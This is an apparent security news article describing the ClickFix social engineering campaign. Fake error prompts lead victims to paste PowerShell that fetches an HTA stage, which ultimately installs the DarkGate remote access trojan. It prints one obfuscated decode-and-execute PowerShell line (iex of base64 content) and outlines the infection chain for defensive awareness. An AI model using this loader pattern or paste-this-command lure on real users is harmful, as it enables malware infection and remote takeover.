A new social engineering scheme, dubbed “ClickFix,” is actively tricking users into installing the sophisticated DarkGate malware by impersonating legitimate “Word Online” error messages. This campaign represents a shift in attack vectors, moving away from automated downloads to a more hands-on approach that leverages user trust in troubleshooting procedures.
Security researchers at Point Wild have identified this elaborate phishing operation. Unlike many prevalent malware distribution methods, ClickFix doesn’t rely on drive-by downloads. Instead, it manipulates victims into manually executing malicious commands, exploiting their desire to resolve perceived technical issues. The primary objective is to deliver DarkGate, a potent remote access trojan known for its ability to grant attackers extensive control over compromised systems.
Technical Analysis of the ClickFix Campaign and DarkGate Malware
The ClickFix attack chain begins when a user visits a compromised or specifically crafted malicious webpage. This page then displays a deceptive notification simulating a missing browser extension error. The fake message prompts the user to click a “How to fix” button, presenting itself as a helpful solution to an apparent technical glitch. However, this button is the gateway to the infection.
Upon clicking the “How to fix” button, a JavaScript function is triggered. This function covertly copies a malicious PowerShell script directly to the user’s clipboard. This clever technique is designed to bypass many standard browser-based security controls, as the malicious code is not automatically downloaded but rather prepared for user-initiated execution.
Point Wild analysts highlighted that this reliance on user interaction significantly hinders automated detection systems. Once the unsuspecting victim pastes the copied command into a PowerShell terminal and executes it, the script proceeds to download a malicious HTA (HTML Application) file from a remote server. This HTA file acts as a crucial intermediate stage.
The HTA file establishes persistence on the victim’s system and prepares it for the deployment of the final payload: DarkGate. DarkGate is a highly versatile remote access trojan (RAT) capable of a wide range of malicious activities, including data theft, espionage, and further malware propagation.
In-Depth Look at the Infection Process
The technical execution of the ClickFix campaign involves several layers of obfuscation to conceal the malicious intent. The initial webpage contains base64-encoded data. This data is processed using a reverse function within the HTML structure, making it difficult for casual observation to discern its true purpose. When this encoded data is decoded, it reveals a PowerShell command designed to flush the DNS cache and then download the subsequent stage of the attack.
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)));This command is responsible for fetching a file named `dark.hta` from a compromised domain. Once executed, the `dark.hta` file creates a new directory on the C: drive. Within this directory, it drops an AutoIt executable and a script named `fckhffh.a3x`. This AutoIt script is critical to the final stage of the infection.
The `fckhffh.a3x` script employs the DES (Data Encryption Standard) algorithm to decrypt the actual DarkGate malware payload. Following successful decryption and deployment, the DarkGate malware establishes communication channels with its command-and-control (C2) servers. This establishes unauthorized remote access for the attackers, effectively completing the system compromise.
The emergence of the ClickFix campaign underscores the evolving tactics of cybercriminals. By leveraging social engineering and user-initiated actions, attackers are finding new ways to circumvent traditional security measures. Users are advised to remain vigilant and exercise extreme caution when encountering unexpected error messages or prompts requesting the execution of commands, especially those involving PowerShell.
The ongoing development and deployment of sophisticated malware like DarkGate, facilitated by campaigns such as ClickFix, pose a significant threat to individuals and organizations alike. Continued research and awareness are crucial to staying ahead of these evolving cyber threats.